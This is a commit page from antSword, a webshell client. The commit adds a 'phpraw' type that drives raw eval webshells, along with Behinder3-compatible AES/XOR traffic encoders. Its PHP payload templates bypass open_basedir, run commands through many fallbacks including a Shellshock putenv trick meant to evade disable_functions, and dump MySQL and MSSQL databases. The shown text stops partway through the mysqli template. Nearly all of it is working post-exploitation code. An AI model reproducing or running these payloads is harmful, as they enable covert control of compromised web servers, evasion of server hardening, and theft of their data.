Skip to content

A
antSword
Commit 38ac1b04 authored by Medicean's avatar Medicean Committed by Medicean
Browse files
Options

(Enhance: Core/PHPRAW) 新增 phpraw 类型

parent 644fb473
Hide whitespace changes
Inline Side-by-side
Showing with 1867 additions and 91 deletions
CHANGELOG.md
View file @ 38ac1b04
......@@ -7,6 +7,21 @@
### 核心
* 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug
* 新增 PHPRAW 类型, 该类型 webshell 支持的 WebShell 类似如下代码:
```php
<?php eval(file_get_contents("php://input"));>
```
> 为了方便直连 Behinder3 WebShell, 编码器已内置
### 数据管理
* 优化了编辑 Shell 信息时,URL后缀发生改变后连动修改「连接类型」功能
### 后端模块
* 支持自定义 Content-Type, 默认是 `form`
## 2021/07/25 `v(2.1.14)`
......
modules/request.js
View file @ 38ac1b04
......@@ -110,34 +110,50 @@ class Request {
.sender
.send('request-error-' + opts['hash'], "Blacklist URL");
}
let reqContentType = "form";
let _request = superagent.post(opts['url']);
// 设置headers
_request.set('User-Agent', USER_AGENT.getRandom());
// 自定义headers
for (let _ in opts.headers) {
if (_.toLocaleLowerCase() == 'content-type') {
reqContentType = opts.headers[_];
}
_request.set(_, opts.headers[_]);
}
// 自定义body
let _postData = Object.assign({}, opts.body, opts.data);
if (opts['useChunk'] == 1) {
logger.debug("request with Chunked");
let _postarr = [];
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
let antstream;
if (opts['useRaw'] == 1) {
// raw 模式 data 部分仅发送 pwd 键下的数据
let _tmp = encodeURIComponent(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
});
antstream = new AntRead(_tmp, {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
} else {
let _postarr = [];
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
}
}
antstream = new AntRead(_postarr.join("&"), {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
}
let antstream = new AntRead(_postarr.join("&"), {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
let _datasuccess = false; // 表示是否是 404 类shell
_request
.proxy(APROXY_CONF['uri'])
.type('form')
.type(reqContentType)
// .set('Content-Type', 'application/x-www-form-urlencoded')
.timeout(opts.timeout || REQ_TIMEOUT)
.ignoreHTTPS(opts['ignoreHTTPS'])
......@@ -188,40 +204,47 @@ class Request {
// 通过替换函数方式来实现发包方式切换, 后续可改成别的
const old_send = _request.send;
let _postarr = [];
if (opts['useMultipart'] == 1) {
_request.send = _request.field;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = String(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
});
_postarr[key] = _tmp;
}
}
if (opts['useRaw'] == 1) {
let _tmp = String(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
});
_postarr = _tmp;
} else {
if(opts['addMassData']==1){
for (let i = 0; i < randomInt(num_min, num_max); i++) { //将混淆流量放入到payload数组中
_postData[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
if (opts['useMultipart'] == 1) {
_request.send = _request.field;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = String(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
});
_postarr[key] = _tmp;
}
}
_postData=randomDict(_postData);
//logger.debug(_postData);
}
_request.send = old_send;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
} else {
if(opts['addMassData']==1){
for (let i = 0; i < randomInt(num_min, num_max); i++) { //将混淆流量放入到payload数组中
_postData[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
}
_postData=randomDict(_postData);
//logger.debug(_postData);
}
_request.send = old_send;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
}
}
//console.log(_postarr);
//logger.debug(_postarr);
_postarr = _postarr.join('&');
}
//console.log(_postarr);
//logger.debug(_postarr);
_postarr = _postarr.join('&');
}
_request
.proxy(APROXY_CONF['uri'])
.type('form')
.type(reqContentType)
// 超时
.timeout(opts.timeout || REQ_TIMEOUT)
// 忽略HTTPS
......@@ -292,34 +315,49 @@ class Request {
let indexStart = -1;
let indexEnd = -1;
let tempData = [];
let reqContentType = "form";
let _request = superagent.post(opts['url']);
// 设置headers
_request.set('User-Agent', USER_AGENT.getRandom());
// 自定义headers
for (let _ in opts.headers) {
if (_.toLocaleLowerCase() == 'content-type') {
reqContentType = opts.headers[_];
}
_request.set(_, opts.headers[_]);
}
// 自定义body
let _postData = Object.assign({}, opts.body, opts.data);
if (opts['useChunk'] == 1) {
logger.debug("request with Chunked");
let _postarr = [];
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
let antstream;
if (opts['useRaw'] == 1) {
// raw 模式 data 部分仅发送 pwd 键下的数据
let _tmp = encodeURIComponent(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
});
antstream = new AntRead(_tmp, {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
} else {
let _postarr = [];
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
}
}
antstream = new AntRead(_postarr.join("&"), {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
}
let antstream = new AntRead(_postarr.join("&"), {
'step': parseInt(opts['chunkStepMin']),
'stepmax': parseInt(opts['chunkStepMax'])
});
_request
.proxy(APROXY_CONF['uri'])
.type('form')
.type(reqContentType)
.ignoreHTTPS(opts['ignoreHTTPS'])
.parse((res, callback) => {
res.pipe(through((chunk) => {
......@@ -358,38 +396,45 @@ class Request {
// 通过替换函数方式来实现发包方式切换, 后续可改成别的
const old_send = _request.send;
let _postarr = [];
if (opts['useMultipart'] == 1) {
_request.send = _request.field;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = String(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
});
_postarr[key] = _tmp;
}
}
if (opts['useRaw'] == 1) {
let _tmp = String(opts.data[opts['pwd']]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1);
});
_postarr = _tmp;
} else {
if(opts['addMassData'] == 1){
for (let i = 0; i < randomInt(num_min, num_max); i++) { //将混淆流量放入到payload数组中
_postData[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
if (opts['useMultipart'] == 1) {
_request.send = _request.field;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = String(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
});
_postarr[key] = _tmp;
}
}
_postData=randomDict(_postData);
//logger.debug(_postData);
}
_request.send = old_send;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
} else {
if(opts['addMassData'] == 1){
for (let i = 0; i < randomInt(num_min, num_max); i++) { //将混淆流量放入到payload数组中
_postData[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
}
_postData=randomDict(_postData);
//logger.debug(_postData);
}
_request.send = old_send;
for (var key in _postData) {
if (_postData.hasOwnProperty(key)) {
let _tmp = encodeURIComponent(_postData[key]).replace(/asunescape\((.+?)\)/g, function ($, $1) {
return unescape($1)
}); // 后续可能需要二次处理的在这里追加
_postarr.push(`${key}=${_tmp}`);
}
}
_postarr = _postarr.join('&');
}
_postarr = _postarr.join('&');
}
_request
.proxy(APROXY_CONF['uri'])
.type('form')
.type(reqContentType)
// 设置超时会导致文件过大时写入出错 .timeout(timeout) 忽略HTTPS
.ignoreHTTPS(opts['ignoreHTTPS'])
.send(_postarr)
......
source/app.entry.js
View file @ 38ac1b04
......@@ -168,7 +168,7 @@ const antSword = window.antSword = {
};
//核心模块类型列表
antSword['core_types'] = ['asp','aspx','php','php4','jsp','jspjs','cmdlinux','custom'];
antSword['core_types'] = ['asp','aspx','php','php4','jsp','jspjs','cmdlinux','custom', 'phpraw'];
// 加载核心模板
antSword['core'] = require('./core/');
......
source/core/base.js
View file @ 38ac1b04
......@@ -349,6 +349,7 @@ class Base {
// 发送请求数据
.send('request', {
url: this.__opts__['url'],
pwd: this.__opts__['pwd'],
hash: hash,
data: opt['data'],
tag_s: opt['tag_s'],
......@@ -362,6 +363,7 @@ class Base {
addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
useRaw: this.__opts__['type'].endsWith("raw"),
timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
headers: (this.__opts__['httpConf'] || {})['headers'] || {},
body: (this.__opts__['httpConf'] || {})['body'] || {}
......
source/core/phpraw/decoder/base64.js 0 → 100644
View file @ 38ac1b04
/**
* php::base64解码器
*/
'use strict';
module.exports = {
/**
* @returns {string} asenc 将返回数据base64编码
*/
asoutput: () => {
return `function asenc($out){
return @base64_encode($out);
}
`.replace(/\n\s+/g, '');
},
/**
* 解码 Buffer
* @param {Buffer} buff 要被解码的 Buffer
* @returns {Buffer} 解码后的 Buffer
*/
decode_buff: (buff) => {
return Buffer.from(buff.toString(), 'base64');
}
}
\ No newline at end of file
source/core/phpraw/decoder/default.js 0 → 100644
View file @ 38ac1b04
/**
* php::default解码器
*/
'use strict';
module.exports = {
/**
* @returns {string} asenc 加密返回数据的函数
*/
asoutput: () => {
return `function asenc($out){
return $out;
}
`.replace(/\n\s+/g, '');
},
/**
* 解码 Buffer
* @param {Buffer} buff 要被解码的 Buffer
* @returns {Buffer} 解码后的 Buffer
*/
decode_buff: (buff) => {
return buff;
}
}
\ No newline at end of file
source/core/phpraw/decoder/rot13.js 0 → 100644
View file @ 38ac1b04
/**
* php::base64解码器
* ? 利用php的base64_decode进行解码处理
*/
'use strict';
const rot13encode = (s) => {
//use a Regular Expression to Replace only the characters that are a-z or A-Z
return s.replace(/[a-zA-Z]/g, function (c) {
// Get the character code of the current character and add 13 to it If it is
// larger than z's character code then subtract 26 to support wrap around.
return String.fromCharCode((c <= "Z" ?
90 :
122) >= (c = c.charCodeAt(0) + 13) ?
c :
c - 26);
});
};
module.exports = {
asoutput: (tag_s, tag_e) => {
return `function asenc($out){
return str_rot13($out);
}
`.replace(/\n\s+/g, '');
},
decode_buff: (buff) => {
return Buffer.from(rot13encode(buff.toString()));
}
}
\ No newline at end of file
source/core/phpraw/encoder/base64.js 0 → 100644
View file @ 38ac1b04
'use strict';
module.exports = (pwd, data, ext = null) => {
data[pwd] = Buffer.from(data['_']).toString('base64');
delete data['_'];
return data;
}
source/core/phpraw/encoder/behinder3.js 0 → 100644
View file @ 38ac1b04
/**
* php:: behinder AES 编码器
* Create at: 2021/01/10 01:10:53
*
*/
'use strict';
var CryptoJS = require('crypto-js');
function decryptText(keyStr, text) {
let buff = Buffer.alloc(16, 'a');
buff.write(keyStr,0);
keyStr = buff.toString();
let decodetext = CryptoJS.AES.decrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
iv: CryptoJS.enc.Utf8.parse(Buffer.alloc(16)),
}).toString(CryptoJS.enc.Utf8);
return decodetext;
}
function encryptText(keyStr, text) {
let buff = Buffer.alloc(16, 'a');
buff.write(keyStr,0);
keyStr = buff.toString();
let encodetext = CryptoJS.AES.encrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
iv: CryptoJS.enc.Utf8.parse(Buffer.alloc(16)),
}).toString();
return encodetext;
}
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
let randomID;
if (ext.opts.otherConf['use-random-variable'] === 1) {
randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
} else {
randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
let key = CryptoJS.MD5(pwd).toString().substr(0,16);
data[pwd] = encryptText(key, `${randomID}|@eval(base64_decode("${Buffer.from(data['_']).toString("base64")}"));`);
delete data['_'];
return data;
}
source/core/phpraw/encoder/behinder3xor.js 0 → 100644
View file @ 38ac1b04
/**
* php:: behinder XOR 编码器, 无 openssl 扩展时使用
* Create at: 2021/01/10 01:10:53
*
*/
'use strict';
var CryptoJS = require('crypto-js');
/*
* @param {String} pwd 连接密码
* @param {Array} data 编码器处理前的 payload 数组
* @return {Array} data 编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
let randomID;
if (ext.opts.otherConf['use-random-variable'] === 1) {
randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
} else {
randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
let dataarr = Buffer.from(`${randomID}|@eval(base64_decode("${Buffer.from(data['_']).toString("base64")}"));`);
let keyarr = Buffer.from(CryptoJS.MD5(pwd).toString().substr(0,16));
for (let i = 0; i < dataarr.length; i++) {
dataarr[i] = dataarr[i] ^ keyarr[i + 1 & 15];
}
data[pwd] = dataarr.toString("base64");
delete data['_'];
return data;
}
source/core/phpraw/encoder/hex.js 0 → 100644
View file @ 38ac1b04
'use strict'
module.exports = (pwd, data, ext = null) => {
// 编码并去除多余数据
data[pwd] = Buffer.from(data['_']).toString("hex");
delete data['_'];
// 返回数据
return data;
}
source/core/phpraw/index.js 0 → 100644
View file @ 38ac1b04
'use strict';
// import Base from '../base';
const Base = require('../base');
class PHPRAW extends Base {
constructor(opts) {
super(opts);
// 解析模板
[
'base',
'command',
'filemanager',
'database/mysql',
'database/mysqli',
'database/mssql',
'database/sqlsrv',
'database/oracle',
'database/oracle_oci8',
'database/postgresql',
'database/postgresql_pdo',
'database/sqlite3',
'database/sqlite_pdo',
].map((_) => {
this.parseTemplate(`./phpraw/template/${_}`);
});
// 解析编码器
this
.encoders
.map((_) => {
this.parseEncoder(`./phpraw/encoder/${_}`);
});
this
.decoders
.map((_) => {
this.parseDecoder(`./phpraw/decoder/${_}`);
});
}
/**
* 获取编码器列表
* ? 可以在antSword.core.php.prototype.encoders中获取此变量
* @return {array} 编码器列表
*/
get encoders() {
return ["base64", "hex", "behinder3", "behinder3xor"];
}
get decoders() {
return ["default", "base64", "rot13"];
}
/**
* HTTP请求数据组合函数
* @param {Object} data 通过模板解析后的代码对象
* @param {bool} force_default 强制使用 default 解码
* @return {Promise} 返回一个Promise操作对象
*/
complete(data, force_default = false) {
// 分隔符号
let tag_s, tag_e;
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
} else {
tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
}
if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
} else {
tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
}
let asencCode;
let ext = {
opts: this.__opts__,
};
if (!force_default) {
asencCode = this.__decoder__[this.__opts__['decoder'] || 'default'].asoutput(ext);
} else {
asencCode = this.__decoder__['default'].asoutput(ext);
}
// 组合完整的代码
// @chdir('.');@ini_set('open_basedir','..');for($i=0;$i<10;$i++){@chdir('..');}@ini_set('open_basedir','/');
let tmpCode = data['_'];
let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5));
let bypassOpenBaseDirCode = `
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("/;|:/"),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)){
continue;
};
$tmdir=$item."/.${opdir}";
@mkdir($tmdir);
if(!@file_exists($tmdir)){
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\\\\\|\\//",$tmdir);
for($i=0;$i<sizeof($cntarr);$i++){
@chdir("..");
};
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
};
};`.replace(/\n\s+/g, '');
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${bypassOpenBaseDirCode};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
// 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data);
}
}
module.exports = PHPRAW;
\ No newline at end of file
source/core/phpraw/template/base.js 0 → 100644
View file @ 38ac1b04
/**
* 基础信息模板
* ? 获取系统信息、当前用户、当前路径、盘符列表
*/
module.exports = () => ({
info: {
_: `$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")
$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}else{
$R.="/";
}
$R.="\t";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="\t{$s}";
echo $R;`.replace(/\n\s+/g, '')
},
probedb: { // 检测数据库函数支持
_: `$m=array('mysql_close','mysqli_close','mssql_close','sqlsrv_close','ora_close','oci_close','ifx_close','sqlite_close','pg_close','dba_close','dbmclose','filepro_fieldcount','sybase_close');
foreach ($m as $f) {
echo($f."\\t".(function_exists($f)?'1':'0')."\\n");
};
$n=array('SQLite3');
foreach ($n as $f) {
echo($f."\\t".(class_exists($f)?'1':'0')."\\n");
};
if(function_exists('pdo_drivers')){
foreach(@pdo_drivers() as $f){
echo("pdo_".$f."\\t1\\n");
}
}`.replace(/\n\s+/g, '')
}
})
\ No newline at end of file
source/core/phpraw/template/command.js 0 → 100644
View file @ 38ac1b04
/**
* 虚拟终端命令执行
*/
module.exports = (arg1, arg2, arg3) => ({
exec: {
_: `$p=base64_decode(substr("#{newbase64::bin}",#randomPrefix#));
$s=base64_decode(substr("#{newbase64::cmd}",#randomPrefix#));
$envstr=@base64_decode(substr("#{newbase64::env}",#randomPrefix#));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
if(substr($d,0,1)=="/"){
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
}else{
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
if(!empty($envstr)){
$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r="{$p} {$c}";
function fe($f){
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)){
$d=array();
}else{
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
};
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};
function runcmd($c){
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')){
@system($c,$ret);
}elseif(fe('passthru')){
@passthru($c,$ret);
}elseif(fe('shell_exec')){
print(@shell_exec($c));
}elseif(fe('exec')){
@exec($c,$o,$ret);
print(join("\n",$o));
}elseif(fe('popen')){
$fp=@popen($c,'r');
while(!@feof($fp)){
print(@fgets($fp,2048));
}
@pclose($fp);
}elseif(fe('proc_open')){
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){
print(@fgets($io[1],2048));
}
while(!@feof($io[2])){
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
}elseif(fe('antsystem')){
@antsystem($c);
}elseif(runshellshock($d, $c)) {
return $ret;
}elseif(substr($d,0,1)!="/" && @class_exists("COM")){
$w=new COM('WScript.shell');
$e=$w->exec($c);
$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);
}else{
$ret = 127;
}
return $ret;
};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
},
listcmd: {
_: `$arr=explode(",",base64_decode(substr("#{newbase64::binarr}",#randomPrefix#)));
foreach($arr as $v){
echo($v."\t".(file_exists($v)?"1":"0")."\n");
}`.replace(/\n\s+/g, ''),
},
quote: {
_: `$p=base64_decode(substr("#{newbase64::bin}",#randomPrefix#));$s=base64_decode(substr("#{newbase64::cmd}",#randomPrefix#));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
}
})
\ No newline at end of file
source/core/phpraw/template/database/mssql.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::mssql
* i 数据分隔符号 => \t|\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$T=@mssql_connect($hst,$usr,$pwd);
$q=@mssql_query("select [name] from master.dbo.sysdatabases order by 1",$T);
while($rs=@mssql_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T);
$q=@mssql_query("SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1",$T);
while($rs=@mssql_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
$T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T);
$q=@mssql_query("SELECT TOP 1 * FROM {$tab}",$T);
while($rs=@mssql_fetch_field($q)){
echo(trim($rs->name)." ({$rs->type}({$rs->max_length}))".chr(9));
}
@mssql_free_result($q);
@mssql_close($T);`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$T=@mssql_connect($hst,$usr,$pwd);
@mssql_select_db($dbn,$T);
$q=@mssql_query($sql,$T);
if(is_bool($q)){
echo("Status\\t|\\tAffect Rows\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t".base64_encode(@mssql_rows_affected($T)." row(s)")."\\t|\\t\\r\\n");
}else{
$i=0;
while($rs=@mssql_fetch_field($q)){
echo($rs->name."\\t|\\t");
$i++;
}
echo("\\r\\n");
while($rs=@mssql_fetch_row($q)){
for($c=0;$c<$i;$c++){
echo(base64_encode(trim($rs[$c])));
echo("\\t|\\t");
}
echo("\\r\\n");
}
@mssql_free_result($q);
}
@mssql_close($T);`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/mysql.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::mysql
* i 数据分隔符号 => \t|\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW DATABASES");
while($rs=@mysql_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mysql_close($T);`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$T=@mysql_connect($hst,$usr,$pwd);
$q=@mysql_query("SHOW TABLES FROM \`{$dbn}\`");
while($rs=@mysql_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mysql_close($T);`.replace(/\n\s+/g, ''),
},
// 显示表字段
show_columns: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$tab=base64_decode("#{base64::table}");
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db( $dbn, $T);
$q=@mysql_query("SHOW COLUMNS FROM \`{$tab}\`");
while($rs=@mysql_fetch_row($q)){
echo(trim($rs[0])." (".$rs[1].")".chr(9));
}
@mysql_close($T);`.replace(/\n\s+/g, ''),
},
// 执行SQL语句
query: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
$sql=base64_decode("#{base64::sql}");
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_query("SET NAMES ".base64_decode("#{base64::encode}"));
@mysql_select_db($dbn, $T);
$q=@mysql_query($sql);
if(is_bool($q)){
echo("Status\\t|\\t\\r\\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\\t|\\t\\r\\n");
}else{
$i=0;
while($col=@mysql_fetch_field($q)){
echo($col->name."\\t|\\t");
$i++;
}
echo("\\r\\n");
while($rs=@mysql_fetch_row($q)){
for($c=0;$c<$i;$c++){
echo(base64_encode(trim($rs[$c])));
echo("\\t|\\t");
}
echo("\\r\\n");
}
}
@mysql_close($T);`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/core/phpraw/template/database/mysqli.js 0 → 100644
View file @ 38ac1b04
/**
* 数据库管理模板::mysql
* i 数据分隔符号 => \t|\t
*/
module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
// 显示所有数据库
show_databases: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
list($hst, $port) = explode(":", $hst);
$port == "" ? $port = "3306" : $port;
$T=@mysqli_connect($hst,$usr,$pwd,"",$port);
$q=@mysqli_query($T,"SHOW DATABASES");
while($rs=@mysqli_fetch_row($q)){
echo(trim($rs[0]).chr(9));
}
@mysqli_close($T);`.replace(/\n\s+/g, ''),
},
// 显示数据库所有表
show_tables: {
_: `
$hst=base64_decode("#{base64::host}");
$usr=base64_decode("#{base64::user}");
$pwd=base64_decode("#{base64::passwd}");
$dbn=base64_decode("#{base64::db}");
list($hst, $port) = explode(":", $hst);
